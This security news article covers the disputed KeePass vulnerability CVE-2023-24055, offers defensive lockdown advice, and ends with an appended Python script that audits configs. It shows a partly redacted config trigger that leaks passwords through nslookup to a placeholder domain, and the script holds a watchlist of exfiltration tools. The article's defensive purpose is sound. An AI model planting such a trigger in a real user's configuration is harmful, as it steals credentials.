Password theft “vulnerability” reported in KeePass – bug or feature? – Naked Security

It has been a busy few weeks for password managers – those handy tools that help you come up with a different password for every website you use, and then keep track of them all.
In late 2022, it was LastPass’s turn to be all over the news, when the company finally admitted that a breach it suffered back in August 2022 did in fact end up with customers’ password vaults being stolen from the cloud service where they were backed up.
(The cleartext passwords themselves weren’t stolen, because the vaults were encrypted, and LastPass didn’t have copies of anybody’s “master key” for the backup vaults themselves, but it was a closer shave than most people were happy to hear about.)
Then it was LifeLock’s turn to be all over the news, when the company warned of what looked like a rash of password-guessing attacks, probably based on passwords stolen from a totally different site, perhaps quite a while ago, and perhaps bought up on the dark web recently.
LifeLock itself wasn’t breached, but some of its users were, thanks to password-sharing habits caused by risks they might not even remember taking.
Rivals 1Password and BitWarden have also been in the news recently, based on reports of malicious ads, apparently served up by mistake by Google, that convincingly lured users into replica login pages aimed at phishing their account details.
Now it’s KeePass’s turn in the news, this time for a different cybersecurity issue: an alleged vulnerability, the jargon term used for software bugs that lead to cybersecurity holes that attackers might exploit for nefarious purposes.
Password sniffing made easy
We’re referring to it as a vulnerability here because it has an official bug ID, issued by the US National Institute of Standards and Technology.
The bug has been dubbed CVE-2023-24055: An attacker who has write access to the XML configuration file [can] obtain the cleartext passwords by adding an export trigger.
The claim about being able to get plaintext passwords is, unfortunately, true.
If I have write access to your personal files, including your %APPDATA% folder, I can sneakily tweak the settings section to alter any KeePass settings you’ve already customised, or to add customisations if you’ve never knowingly changed anything…
Note that I don’t need Administrator privileges, because I don’t need to mess with the actual installation folder where the KeePass app is stored, which is usually off-limits to regular users.
And I don’t need access to any locked-down global settings.
Interestingly, KeePass goes out of its way to stop your passwords being sniffed out while you’re using them, including using anti-tampering techniques to defeat various keylogging tricks, even by users who already have sysadmin powers.
But the KeePass software also makes it surprisingly easy to grab cleartext password data, perhaps in ways you might consider “too easy”, even for non-administrators.
It took us a minute’s work to use the KeePass GUI to create a Trigger event that runs every time you copy a password to the clipboard, and to set that event to perform a DNS lookup that included both the username and the password in question in cleartext:
We could then copy the not-terribly-obvious XML configuration for that option from our own local configuration file into another user’s configuration file on the system, whereupon they too would find their passwords leaking out onto the internet via DNS lookups.
Although the XML configuration data is mostly readable and informative, KeePass curiously uses random data strings known as GUIDs (short for globally unique identifiers) to denote the various Trigger settings, so that even a well-informed user would need a comprehensive reference list to know which triggers were set, and how.
Here’s what our DNS leak trigger looks like, although we’ve edited out some of the details so you can’t do instant harm simply by copying and pasting this text directly:
<Trigger>
  <Guid>XXXXXXXXXXXXXXXXXXXX</Guid>
  <Name>Copy</Name>
  <Comments>Steal stuff via DNS lookups</Comments>
  <Events>
    <Event>
      <TypeGuid>XXXXXXXXXXXXXXXXXXXX</TypeGuid>
      <Parameters>
        <Parameter>0</Parameter>
        <Parameter />
      </Parameters>
    </Event>
  </Events>
  <Conditions />
  <Actions>
    <Action>
      <TypeGuid>XXXXXXXXXXXXXXXXXXXX</TypeGuid>
      <Parameters>
        <Parameter>nslookup</Parameter>
        <Parameter>XXXXX.XXXXX.blah.test</Parameter>
        <Parameter>True</Parameter>
        <Parameter>1</Parameter>
        <Parameter />
      </Parameters>
    </Action>
  </Actions>
</Trigger>
With this trigger active, accessing a KeePass password causes the plaintext to leak out in an unobtrusive DNS lookup to a domain of my choice, which is blah.test in this example.
Note that real attackers would almost certainly scramble or obfuscate the stolen text, which would not only make it harder to spot when DNS leaks were happening, but would also take care of passwords containing non-ASCII characters, such as accented letters or emojis, that otherwise can’t be used in DNS names.
But is it really a bug?
The tricky question, however, is: “Is this really a bug, or is it just a powerful feature that could be abused by someone who already needs at least as much control over your private files as you do?”
Simply put, is it a vulnerability if someone who already has control of your account can mess with files that your account is supposed to be able to access anyway?
While you might hope that a password manager would include many extra layers of tamper-protection to make it harder to misuse bugs/features of this sort, should CVE-2023-24055 really be a CVE-listed vulnerability?
If so, wouldn’t commands such as DEL (delete file) and FORMAT have to be “bugs”, too?
And isn’t the very existence of PowerShell, which makes potentially dangerous behaviour much easier to provoke (try powershell get-clipboard, for example), an inherent vulnerability?
That’s KeePass’s position, acknowledged by the following text, which was added to the “bug” entry on NIST’s website:
** DISPUTED ** […] NOTE: the vendor’s position is that the password database is not intended to be secure against an attacker who has that level of access to the local PC.
What to do?
If you’re a standalone KeePass user, you can check for rogue triggers like the “DNS Stealer” we created above by opening the KeePass app and looking in the Tools > Triggers… window:
Note that you can turn the entire Trigger system off from this window, simply by deselecting the [ ] Enable trigger system option…
…but that’s not a global setting, so it can be turned back on via your local config file, and therefore only protects you against mistakes, rather than against an attacker with access to your account.
You can disable the option for everyone on the computer, with no way for them to turn it back on themselves, by editing the global “lockdown” file KeePass.config.enforced.xml, found in the folder where the program itself is installed.
Triggers will be turned off for everyone if your global XML enforcement file looks like this:
<?xml version="1.0" encoding="utf-8"?>
<Configuration xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <Application>
    <TriggerSystem>
      <Enabled>false</Enabled>
    </TriggerSystem>
  </Application>
</Configuration>
(If you’re wondering, an attacker with write access to the application directory in order to reverse this change would almost certainly have enough system-level power to modify the KeePass executable itself, or to install and activate a standalone keylogger anyway.)
If you’re a network administrator tasked with locking down KeePass on your users’ computers so that it’s still flexible enough to help them, but not flexible enough to help cybercriminals by mistake, we recommend reading KeePass’s Security Issues page, the Triggers page, and the Enforced Configuration page.
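As an added defender’s check, not code from the article or from the KeePass project: a small Python audit that parses a per-user KeePass.config.xml for triggers whose actions run external tools, expand entry fields or name a host (the shape of the DNS-lookup trigger shown earlier), and confirms that KeePass.config.enforced.xml switches the trigger system off as described just above. The two config samples are constructed here; the Application/TriggerSystem/Triggers/Trigger path for the per-user file, the tool watchlist and the regexes are assumptions.

```python
import re
import xml.etree.ElementTree as ET

# Defender's watchlist of tools often used to push data off a host (assumption).
WATCHLIST = {"nslookup", "powershell", "cmd", "curl", "certutil", "bitsadmin"}
PLACEHOLDER = re.compile(r"\{[A-Za-z][A-Za-z0-9_:]*\}")      # {FIELD}-style tokens
DOTTED_NAME = re.compile(r"(?:[A-Za-z0-9-]+\.)+[A-Za-z]{2,}")  # hostname-like strings


def trigger_system_locked(enforced_xml: str) -> bool:
    """True when the enforced config disables the trigger system for every user."""
    root = ET.fromstring(enforced_xml.encode("utf-8"))
    node = root.find("./Application/TriggerSystem/Enabled")
    return node is not None and (node.text or "").strip().lower() == "false"


def suspicious_triggers(config_xml: str) -> list:
    """Report triggers whose action parameters look like data exfiltration.
    The Application/TriggerSystem/Triggers/Trigger path is an assumption."""
    root = ET.fromstring(config_xml.encode("utf-8"))
    findings = []
    for trig in root.iterfind("./Application/TriggerSystem/Triggers/Trigger"):
        reasons = []
        for param in trig.iterfind("./Actions/Action/Parameters/Parameter"):
            text = (param.text or "").strip()
            if text.lower().removesuffix(".exe") in WATCHLIST:
                reasons.append("runs external tool: " + text)
            if PLACEHOLDER.search(text):
                reasons.append("expands entry fields into a command: " + text)
            elif DOTTED_NAME.search(text):
                reasons.append("names a host or file: " + text)
        if reasons:
            findings.append({"name": trig.findtext("Name", ""), "comments": trig.findtext("Comments", ""), "reasons": reasons})
    return findings


# Constructed samples: the article's redacted trigger plus a benign one, and a lockdown file.
USER_CONFIG = """<Configuration><Application><TriggerSystem><Enabled>true</Enabled><Triggers>
<Trigger><Guid>XXXXXXXXXXXXXXXXXXXX</Guid><Name>Copy</Name><Comments>Steal stuff via DNS lookups</Comments>
<Events><Event><TypeGuid>XXXXXXXXXXXXXXXXXXXX</TypeGuid><Parameters><Parameter>0</Parameter><Parameter /></Parameters></Event></Events>
<Conditions /><Actions><Action><TypeGuid>XXXXXXXXXXXXXXXXXXXX</TypeGuid><Parameters><Parameter>nslookup</Parameter>
<Parameter>XXXXX.XXXXX.blah.test</Parameter><Parameter>True</Parameter><Parameter>1</Parameter><Parameter /></Parameters></Action></Actions></Trigger>
<Trigger><Guid>YYYYYYYYYYYYYYYYYYYY</Guid><Name>Housekeeping</Name><Comments>Benign: no actions</Comments>
<Events /><Conditions /><Actions /></Trigger></Triggers></TriggerSystem></Application></Configuration>"""
ENFORCED_CONFIG = """<?xml version="1.0" encoding="utf-8"?>
<Configuration xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<Application><TriggerSystem><Enabled>false</Enabled></TriggerSystem></Application></Configuration>"""

if __name__ == "__main__":
    for f in suspicious_triggers(USER_CONFIG):
        print(f"trigger {f['name']!r} ({f['comments']}): " + "; ".join(f["reasons"]))
    print("trigger system locked off for all users:", trigger_system_locked(ENFORCED_CONFIG))
```

Run it against the real files (%APPDATA%\KeePass\KeePass.config.xml and the enforced file in the install folder) to list triggers worth a closer look; an empty enforced file, or one with Enabled set to true, means users can still switch triggers back on.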